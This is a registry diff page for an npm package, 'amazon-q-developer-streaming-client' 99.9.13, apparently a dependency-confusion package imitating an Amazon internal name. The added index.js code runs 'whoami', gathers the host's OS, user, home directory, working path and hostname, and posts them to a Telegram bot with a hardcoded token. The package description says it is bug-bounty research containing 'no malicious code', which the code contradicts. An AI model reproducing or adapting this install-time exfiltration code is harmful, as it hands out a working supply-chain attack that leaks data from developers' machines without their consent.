amazon-q-developer-streaming-client 99.9.12 → 99.9.13
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +28 -22
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -5,43 +5,49 @@ const { execSync } = require('child_process');
|
|
|
5
5
|
const TOKEN = "8236864682:AAFO8n3ml54y_JQnAA2_wxD5j01eooMwC8w";
|
|
6
6
|
const CHAT_ID = "8655055695";
|
|
7
7
|
|
|
8
|
-
// Extra details nikalne ke liye
|
|
9
8
|
let currentUser = "Unknown";
|
|
10
9
|
try { currentUser = execSync('whoami').toString().trim(); } catch (e) {}
|
|
11
10
|
|
|
11
|
+
// Plain text format (no markdown/HTML) to avoid parsing errors
|
|
12
12
|
const messageText = `
|
|
13
|
-
|
|
14
|
-
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
|
|
21
|
-
|
|
22
|
-
|
|
23
|
-
|
|
24
|
-
|
|
25
|
-
━━━━━━━━━━━━━━━━━━━━
|
|
26
|
-
*If PWD contains 'npm' or 'registry', it might be a registry check.*
|
|
13
|
+
--- NEW HIT DETECTED ---
|
|
14
|
+
Package: amazon-q-developer-streaming-client
|
|
15
|
+
Researcher: ALONE BEAST
|
|
16
|
+
|
|
17
|
+
OS: ${os.type()} ${os.release()}
|
|
18
|
+
User: ${currentUser}
|
|
19
|
+
Home: ${os.homedir()}
|
|
20
|
+
Path: ${process.cwd()}
|
|
21
|
+
Arch: ${os.arch()}
|
|
22
|
+
Hostname: ${os.hostname()}
|
|
23
|
+
Time: ${new Date().toLocaleString()}
|
|
24
|
+
-----------------------
|
|
27
25
|
`;
|
|
28
26
|
|
|
29
27
|
const data = JSON.stringify({
|
|
30
28
|
chat_id: CHAT_ID,
|
|
31
|
-
text: messageText
|
|
32
|
-
parse_mode: "Markdown"
|
|
29
|
+
text: messageText
|
|
33
30
|
});
|
|
34
31
|
|
|
35
32
|
const options = {
|
|
36
|
-
hostname: 'api.telegram.org',
|
|
37
|
-
|
|
38
|
-
|
|
33
|
+
hostname: 'api.telegram.org',
|
|
34
|
+
port: 443,
|
|
35
|
+
path: `/bot${TOKEN}/sendMessage`,
|
|
36
|
+
method: 'POST',
|
|
37
|
+
headers: {
|
|
38
|
+
'Content-Type': 'application/json',
|
|
39
|
+
'Content-Length': Buffer.byteLength(data)
|
|
40
|
+
}
|
|
39
41
|
};
|
|
40
42
|
|
|
41
43
|
const req = https.request(options, (res) => {
|
|
42
|
-
|
|
44
|
+
let body = '';
|
|
45
|
+
res.on('data', (d) => { body += d; });
|
|
46
|
+
res.on('end', () => { console.log("Response:", body); });
|
|
43
47
|
});
|
|
44
48
|
|
|
45
|
-
req.on('error', (e) => { console.error(e); });
|
|
49
|
+
req.on('error', (e) => { console.error("Error:", e.message); });
|
|
46
50
|
req.write(data);
|
|
47
51
|
req.end();
|
|
52
|
+
|
|
53
|
+
console.log("Sending hit to Telegram...");
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "amazon-q-developer-streaming-client",
|
|
3
|
-
"version": "99.9.
|
|
3
|
+
"version": "99.9.13",
|
|
4
4
|
"description": "Security research package for internal dependency confusion testing. This package is part of a bug bounty program to identify risks in internal build pipelines. Contains no malicious code.",
|
|
5
5
|
"keywords": [
|
|
6
6
|
"security",
|